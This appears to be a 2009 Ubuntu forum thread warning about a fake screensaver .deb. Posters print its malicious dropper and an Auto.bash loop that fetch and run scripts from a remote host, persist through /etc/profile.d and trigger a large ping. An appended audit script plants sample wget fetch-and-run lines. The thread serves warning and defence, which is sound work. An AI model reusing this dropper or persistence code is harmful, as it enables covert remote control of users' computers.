Page 1 of 15, results 1 to 10 of 142

Thread: YOU THERE!! Malicious script installed as a DEB, please read!

  1. #1
    Join Date
    Dec 2007
    Beans
    124

    YOU THERE!! Malicious script installed as a DEB, please read!

    Hello guys, I'm going to make this brief.

    I have installed a deb from a site claiming to be a screensaver; it looked dodgy, however I proceeded.

    After I looked into the source I found MYSTERIOUS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
    (also no screensaver was ever shown in gnome-screensaver)

    #!/bin/sh
    cd /usr/bin/
    rm Auto.bash
    sleep 1
    wget http://05748.t35.com/Bots/Auto.bash
    chmod 777 Auto.bash
    echo -----------------
    cd /etc/profile.d/
    rm gnome.sh
    sleep 1
    wget http://05748.t35.com/Bots/gnome.sh
    chmod 777 gnome.sh
    echo -----------------
    clear
    exit


    I'm no expert, but this looks just wrong!!

    I have removed the package, however I doubt this has done much good...

    Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

    This all literally happened in the last few minutes and I'm afraid to reboot my computer... should I reinstall my gnome packages?

    Or was I just being paranoid? I'm thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

    Sorry for sounding strange, just trying to fix this A.S.A.P.

    Thank you for any suggestions.
    Last edited by dmizer; December 9th, 2009 at 02:06 AM. Reason: removed hyperlinking to malicious urls

  2. #2
    Join Date
    Dec 2009
    Beans
    3

    Re: YOU THERE!! Malicious script installed as a DEB, please read!

    Excuse my noobishness, but it appears that the DEB replaced those two files and changed the permission level to 777. I would be curious to see the contents of the two files to see what they are trying to do. It does appear you have clicked when you should have clacked, though.

  3. #3
    Join Date
    Jul 2009
    Location
    Dayton Ohio USA
    Beans
    1,070
    Distro
    Ubuntu 13.04 Raring Ringtail

    Re: YOU THERE!! Malicious script installed as a DEB, please read!

    What is the link (URL) for this alleged screensaver?
    Please, not as a hyperlink but as plain text.

  4. #4
    Join Date
    Dec 2007
    Location
    The last place I look
    Beans
    Hidden!
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicious script installed as a DEB, please read!

    Definitely not a screensaver. I looked at some of the scripts that it downloads and most of them are pretty simplistic, so no idea what it is trying to do, but I'm not seeing it do much. For instance, the bash replacement seems to just ping a site "mmowned.com" or some such.

  5. #5
    Join Date
    Dec 2007
    Location
    Gainesville, Florida
    Beans
    Hidden!
    Distro
    Xubuntu 12.04 Precise Pangolin

    Re: YOU THERE!! Malicious script installed as a DEB, please read!

    This is the contents of the Auto.bash script.

    Code:
    while :
    do
    rm /usr/bin/run.bash
    cd /usr/bin/
    wget http://05748.t35.com/Bots/index.php
    wget http://05748.t35.com/Bots/run.bash
    sleep 4
    rm index.php
    chmod 755 run.bash
    command -p /usr/bin/run.bash
    done
    You may want to see if run.bash is running; if so, kill it, and then remove it from /usr/bin/.

    gnome.sh runs Auto.bash

    Also you can whois mmowned.com and complain to the hosting company. Interesting I just looked up the hosting company and they advertise protection against DOS attacks.
    Last edited by pbrane; December 8th, 2009 at 08:54 PM.

  6. #6
    Join Date
    Jul 2007
    Beans
    414
    Distro
    Xubuntu 13.04 Raring Ringtail

    Re: YOU THERE!! Malicious script installed as a DEB, please read!

    Quote Originally Posted by conorsulli:
    #!/bin/sh
    cd /usr/bin/
    rm Auto.bash
    sleep 1
    wget http://05748.t35.com/Bots/Auto.bash
    chmod 777 Auto.bash
    echo -----------------
    cd /etc/profile.d/
    rm gnome.sh
    sleep 1
    wget http://05748.t35.com/Bots/gnome.sh
    chmod 777 gnome.sh
    echo -----------------
    clear
    exit
    Ultimately this seems to be happening:
    ping -s 65507 www.mmowned.com
    which may happen every time you log in - plus it seems designed to keep what it can run updated.

    There's a php file involved too, but I cannot figure out what part that has to play.

    I think you may have just been PWNED.

  7. #7
    Join Date
    Dec 2007
    Beans
    124

    Re: YOU THERE!! Malicious script installed as a DEB, please read!

    OK guys, please help me get this file removed from gnome-look; I have browsed the source code and it contains something definitely malicious.

    http://www.gnome-look.org/content/sh...content=116772

    Please don't install it.

    I'm working on contacting others who have installed it and redirecting them here to resolve the issue.
    Last edited by conorsulli; December 9th, 2009 at 05:27 AM.

  8. #8
    Join Date
    Dec 2007
    Beans
    124

    Re: YOU THERE!! Malicious script installed as a DEB, please read!

    Yes, noticed this after further looking...

    gonna get this guy good

  9. #9
    Join Date
    Oct 2009
    Location
    North Carolina US
    Beans
    54
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicious script installed as a DEB, please read!

    OMG, I installed this earlier today. It hasn't done anything to me yet; please tell me how to remove it!

  10. #10
    Join Date
    Dec 2009
    Beans
    114
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicious script installed as a DEB, please read!

    No, you're right. Whatever goes into /etc/profile.d gets run every time someone logs in. It then downloads another script and runs that. Right now, it is just
    ping -s 65507 www.mmowned.com

    which could at least be used to collect IPs, if this person is also responsible for mmowned.com. Since this script could be replaced with something else at any time, it could easily be used to make your computer assist in a "Denial of Service" attack.

    I'm not an expert on stuff like that either, but it certainly is not an innocent thing to do. As you guess, it probably is intended to be forgotten quickly as just "not working".
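As an added example that is not part of the thread (my code, not any poster's), here is a small POSIX shell audit for the persistence pattern the replies describe: a script dropped into /etc/profile.d so it runs at every login, left world-writable (mode 777), that fetches its real payload over the network. The three file paths /etc/profile.d/gnome.sh, /usr/bin/Auto.bash and /usr/bin/run.bash are the ones named in the posts; everything else (the sample file contents, the temporary root directory, the host name example.invalid) is constructed so the script runs offline.

```shell
#!/bin/sh
# Added example, not from the thread: audit a root directory for the
# profile.d persistence pattern discussed above. File names come from the
# posts; file contents and the host example.invalid are constructed stand-ins.

# Build a constructed sample tree under "$1" that mimics the infected layout.
make_sample_root() {
    root="$1"
    mkdir -p "$root/etc/profile.d" "$root/usr/bin"
    # Login hook left at mode 777, like the dropped gnome.sh (contents constructed)
    printf '#!/bin/sh\n/usr/bin/Auto.bash &\n' > "$root/etc/profile.d/gnome.sh"
    chmod 777 "$root/etc/profile.d/gnome.sh"
    # A fetch-and-run hook with sane permissions (contents constructed)
    printf 'wget http://example.invalid/x.sh -O /tmp/x.sh && sh /tmp/x.sh\n' \
        > "$root/etc/profile.d/update.sh"
    chmod 644 "$root/etc/profile.d/update.sh"
    # A benign control entry that must not be flagged
    printf 'export EDITOR=vi\n' > "$root/etc/profile.d/editor.sh"
    chmod 644 "$root/etc/profile.d/editor.sh"
    # Downloader loop in /usr/bin (contents constructed)
    printf 'while :; do wget http://example.invalid/run.bash; done\n' \
        > "$root/usr/bin/Auto.bash"
    chmod 777 "$root/usr/bin/Auto.bash"
}

# Print, one per line, every regular file in a profile.d directory that is
# either world-writable or pulls something over the network with wget/curl.
audit_profile_d() {
    dir="$1"
    {
        find "$dir" -type f -perm -002
        grep -lE '(wget|curl) +(http|ftp)' "$dir"/* 2>/dev/null || true
    } | sort -u
    return 0
}

# Print which of the file paths named in the thread exist under root "$1".
check_known_paths() {
    root="$1"
    for p in /etc/profile.d/gnome.sh /usr/bin/Auto.bash /usr/bin/run.bash; do
        if [ -e "$root$p" ]; then echo "$p"; fi
    done
    return 0
}

# Demo against the constructed tree. On a real host you would instead run
# audit_profile_d /etc/profile.d and check_known_paths / (root is "/").
demo() {
    tmp=$(mktemp -d)
    make_sample_root "$tmp"
    echo "Suspicious profile.d entries under $tmp:"
    audit_profile_d "$tmp/etc/profile.d"
    echo "Known dropped files present:"
    check_known_paths "$tmp"
    rm -rf "$tmp"
}
demo
```

The audit deliberately flags two different signals: the permission bit alone (a 777 file in a directory that root is supposed to own is wrong regardless of content) and a network fetch in a login script (which is how the dropper keeps its payload replaceable, as post #10 points out). To go with post #5's advice, check for the loop still running with `ps -ef | grep '[r]un.bash'` before deleting the files, or the running copy will simply re-download them.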
